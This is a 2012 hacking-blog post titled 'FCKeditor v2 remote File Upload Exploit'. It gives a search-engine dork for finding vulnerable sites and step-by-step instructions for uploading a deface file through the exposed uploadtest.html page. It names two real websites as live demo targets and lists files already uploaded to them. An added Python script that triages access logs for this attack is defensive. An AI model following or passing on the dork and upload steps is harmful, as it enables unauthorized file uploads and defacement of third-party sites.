HACKERS UNDERGROUND © 2012 BY RISHABH SHARMA

Saturday, 4 February 2012

FCKeditor v2 remote File Upload Exploit

FCKeditor v2 Files Upload Exploit


Google and Bing Dork: intitle:"FCKeditor - Uploaders Tests"
Category : Remote Upload
Exploit : http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html
Publisher : www.hackersunderground.blogspot.com
Go to Google.com or Bing.com and type this dork: intitle:"FCKeditor - Uploaders Tests"
(use both search engines to find more vulnerable websites)
You will now get the FCKeditor upload option. You can also reach the upload option by going to this URL:
http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html
Now change the Select the "File Uploader" to use option to PHP.
Then select your .txt deface file and click "Send it to the server" (some websites allow you to upload .html and .jpg files).
If your file is uploaded successfully, you will get a "File uploaded with no errors" alert.
To view your file, see the Uploaded File URL,
or go to http://www.website.domain/userfiles/yourfilehere or http://www.website.domain/path/userfiles/yourfilehere
Live Demo : http://www.relationshiptrends.com/affiliate/fckeditor/editor/filemanager/connectors/uploadtest.html
http://minisite.nku.edu.tr/fckeditor/editor/filemanager/connectors/uploadtest.html
Result :
http://minisite.nku.edu.tr//userfiles/aaaaaaaa.txt
http://www.relationshiptrends.com/affiliate/img/aaaaaaaa.txt
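
For site owners, the requests described above leave a recognizable trail in web server access logs. The following is an added example, not part of the original post: it triages access-log lines for hits on the uploadtest.html page and for POSTs under the connectors path. The log lines, IP addresses and the php/upload.php connector path in the sample are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (common log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Feb/2012:10:01:02 +0000] "GET /fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 5120
203.0.113.7 - - [04/Feb/2012:10:01:40 +0000] "POST /fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 200 310
203.0.113.7 - - [04/Feb/2012:10:02:05 +0000] "GET /userfiles/aaaaaaaa.txt HTTP/1.1" 200 42
198.51.100.9 - - [04/Feb/2012:10:03:00 +0000] "GET /userfiles/logo.jpg HTTP/1.1" 200 20480
198.51.100.23 - - [04/Feb/2012:10:04:00 +0000] "GET /admin/fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 404 210
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
CONNECTORS = "/editor/filemanager/connectors/"  # path prefix taken from the post

def classify(method, path, status):
    """Label one request, or return None if it does not touch the uploader."""
    path = path.split("?", 1)[0].lower()
    if path.endswith(CONNECTORS + "uploadtest.html"):
        return "test_page_exposed" if status == 200 else "test_page_probe"
    if method == "POST" and CONNECTORS in path and status == 200:
        return "connector_upload"
    return None

def triage(log_text):
    """Map each client IP to the most serious uploader event seen for it."""
    events = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, path, status = m.groups()
        label = classify(method, path, int(status))
        if label:
            events[ip].add(label)
    findings = {}
    for ip, seen in events.items():
        if "connector_upload" in seen:
            findings[ip] = "upload"   # a file was accepted: review the upload directory
        elif "test_page_exposed" in seen:
            findings[ip] = "exposed"  # test page is served: remove it
        else:
            findings[ip] = "probe"    # request failed: scanning only
    return findings

if __name__ == "__main__":
    for ip, verdict in sorted(triage(SAMPLE_LOG).items()):
        print(ip, verdict)
```

Any "exposed" or "upload" verdict means the uploadtest.html page and its connectors are still reachable on the server and should be removed or access-restricted.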


I spent 30 minutes writing this post;
please spend 30 seconds and write a comment below.


 post by rishabh sharma hackersunderground
